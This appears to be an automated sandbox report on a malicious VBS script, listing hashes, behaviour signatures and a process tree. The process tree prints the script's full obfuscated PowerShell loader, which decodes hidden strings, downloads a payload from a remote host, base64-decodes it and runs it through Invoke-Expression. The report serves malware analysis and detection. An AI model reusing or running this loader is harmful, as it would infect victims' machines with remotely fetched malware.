Analysis
-
max time kernel
153s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17/04/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35.vbs
Resource
win10v2004-20240412-en
General
-
Target
6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35.vbs
-
Size
402KB
-
MD5
703313812e7eb2ae5f0fd8e57d3dd125
-
SHA1
fc8bff9090347b291d37fa579e8edf02c1bfe01e
-
SHA256
6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35
-
SHA512
6aac5aaacee99f99b3fd7cd1f66e3eb7adf28646bcac8fc2af4a2324da2dfdf1303be65effe4f163015b94a2829be7e62b038c58cbd404030ca70c85f5c41a5a
-
SSDEEP
6144:ltrc0iH9QXg0Ip+QUJFUWtBVkmqtcECDGk8FD3ZGGBXMV7:lFidQ0AzzfZ
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 3 2460 WScript.exe 7 1780 powershell.exe 8 1780 powershell.exe 9 1780 powershell.exe 10 1780 powershell.exe 11 1780 powershell.exe 12 1780 powershell.exe 13 1780 powershell.exe 14 1780 powershell.exe 15 1780 powershell.exe 16 1780 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1780 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2460 wrote to memory of 1780 2460 WScript.exe 30 PID 2460 wrote to memory of 1780 2460 WScript.exe 30 PID 2460 wrote to memory of 1780 2460 WScript.exe 30 PID 1780 wrote to memory of 1544 1780 powershell.exe 32 PID 1780 wrote to memory of 1544 1780 powershell.exe 32 PID 1780 wrote to memory of 1544 1780 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unburn = 1;$Procrypsis='Substrin';$Procrypsis+='g';Function Lseners126($Schizomycetic){$Bytt88=$Schizomycetic.Length-$Unburn;For($Skrmhaandteringerne=2; $Skrmhaandteringerne -lt $Bytt88; $Skrmhaandteringerne+=(3)){$Paleornithology+=$Schizomycetic.$Procrypsis.Invoke($Skrmhaandteringerne, $Unburn);}$Paleornithology;}function Sherifian($Demicaponier){&($Imperialised) ($Demicaponier);}$Momstabel=Lseners126 'ViMSpoAlzIsiMilEplKuah./ B5T .Sn0 P Q.( .W .i SnBed noTawSksHu PeNKoT , S1 0 .M.0Do;Ap TeW,ri n o6Sm4Ad; T .tx K6f.4P ;Te Dera.vS : j1M,2Ed1.e. u0P ) H PeGDieFoc UkTooS,/M.2S,0Im1 ,0kl0 M1Ca0Fl1 a AfFDeiBrrOveOpf,lo Px.m/Sp1 ,2He1.e.El0Bo ';$lacunaria=Lseners126 'ArUsts BeS rEp-AnAHmgDeeUnn .t N ';$Malerne=Lseners126 'FihS.t t Up Os B: S/Ud/.al kikrtUntSleBir,n.,ocWiaHutStbP o rx .F.m.uo ke V/Kri NaSh7ChcCagBaxSj.,eckau Ar . ';$Copied86=Lseners126 ' >Fo ';$Imperialised=Lseners126 'StiSte GxAn ';$Twined = Lseners126 ' ieStcOmhPao.r D,%AdaO p.npwhdFlaRit BaA %Bu\BaB ye rhGjnUsduniK,g dsFottwe K.AlL,re Sn r K&Pr&T SeRecAghSco , Hy$No ';Sherifian (Lseners126 ' g$O.gUnlBroCabAfaDylEn: LG BoDipUllVee erF.sAs=Ma(Axc HmFodap Ba/StcR Uo$EfTphwCeiV.nCoeSvdU )Un ');Sherifian (Lseners126 ' M$FogUrlKlo SbEkaOol U: ,D aDay il Ve ,sSas.n9Pr1Al=Pe$ SMD.a PlAfeOrr,inMeeFj.S.sOrpLalGui,ht p(Fy$ RCBaoStpfui Ae Td,u8K.6 .)Ea ');$Malerne=$Dayless91[0];Sherifian (Lseners126 ' ,$K.gArlP oY,bEna Slba:ReRWadResgaeOvlUls ifTauSll .dCaeS.=R.NBoeStwSc-H O Fb.ojUneToc.rtPi D SS.yDes etdieHemDg.svN ,eRetTi.,kWNoeS.b HC,pl iI.e ,nO tSk ');Sherifian (Lseners126 'Wo$AuRNadRosPler,l FsKofMau Sl edPaeWa. ,HreeKoaSkdGreSrrDosSh[P,$ l Sa c,eu .n Da nrBeiTha M]Sa=.a$SlM oo.em s ,tUna ,bAte .lNe ');$Brevenes=Lseners126 ',oRR dU sNue,rlBrsHefLouUnl.fdFoe .ReDBroObwU,nMolBaoP.aSudAfF oi plTee ,(e $.rM Ba lE.ebrr,tn Fe.d,.a$MoCTraBarT iDebUpi keEnnOssM,)La ';$Brevenes=$Goplers[1]+$Brevenes;$Caribiens=$Goplers[0];Sherifian (Lseners126 'Fo$ eg MlNoo.mbCeaPel.c:kaDOpyO kG.kObe ,rT.dEsrGoa.ugIctUn=Ta(GlTSae,osHytB -PlPCra OtFohFi .b$VeCSuaPrr.ai eb,oi KePrnPas k)Br ');while (!$Dykkerdragt) {Sherifian (Lseners126 'Na$ SgN lFlo sbPra l.i:DoTF oDep IpazePunHisS,= e$FotP.rKau WeGe ') ;Sherifian $Brevenes;Sherifian (Lseners126 'BuSCytA aLirTttZa-TiSFolSie oe npT, Un4Sm ');Sherifian (Lseners126 'Gl$ GgHalBaomobSua .l e:ChDI,yDakGek BeOvrSnd orA aDog otWa=La(E,Tf.euts,etLy- tP ua utC.hbo In$SuC.va or ni.vbRii De KnB sIn) F ') ;Sherifian (Lseners126 'Hj$H.gDel VoElb SaTflNo:UbEAnpAsiLapP la alrsrem.o=.n$FjgDel Ao bOma .lS :A.A Pn SnNouCoaAnt .iOvoDunRe+,r+R,%Ce$D.D Sa PyMdl PeUnsFos,m9No1Cr..ocProH,uF,nt t B ') ;$Malerne=$Dayless91[$Epiplasm];}Sherifian (Lseners126 ' a$FogSelP,oFob RaEul S:b.H.ia EeB v OdB.eSv M,=Fi UnG seBetLa-TiC ioFln tUneSpn Ltav an$DrC aL,rLiiHebB,iCoe .n ,s . ');Sherifian (Lseners126 'th$HegNal Fo nb HaSel e:ToOSkub,t.nvM,oreyD.a,agFoeHu ,=P. D.[ kS .yUds CtP eBamG .UhC,oo.nn WvfleDerLntDu]Bo:S,: ,FBir,eoFem yBUnaK.sB,eSs6,r4 BSE t urFliHanR.g ,(.o$.yHsha .eChvKrdpeeKr)Me ');Sherifian (Lseners126 'ci$O gInlUno.lb ,aS,l ,:UeBJeePlc .k.beKar V No=.n L[InS eyVes etabeVim u.EnTsneskxGithe.FlEHanM.cInoT.d DiAfn .g x]St:Su:AeAOuSKoC .I UI P.UrGFye,atEtSFot,orLeiRen,og h( $UhO uSttPrv,ooV.yViaD gLaeN )S ');Sherifian (Lseners126 ' $frg,plCooFobPeaPol.e:SvBPllGea s Ei GnO.g SaSmmFeeFa=Lo$.uBIneLac .k ,eNorEv.,esDiu rb,lsMatB,rPeiRenamg (A.3Ou0An7Ul1.t4Ka5Mi, B2 7Be8 B5By0 ,)U ');Sherifian $Blasingame;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Behndigste.Len && echo $"3⤵PID:1544
-
-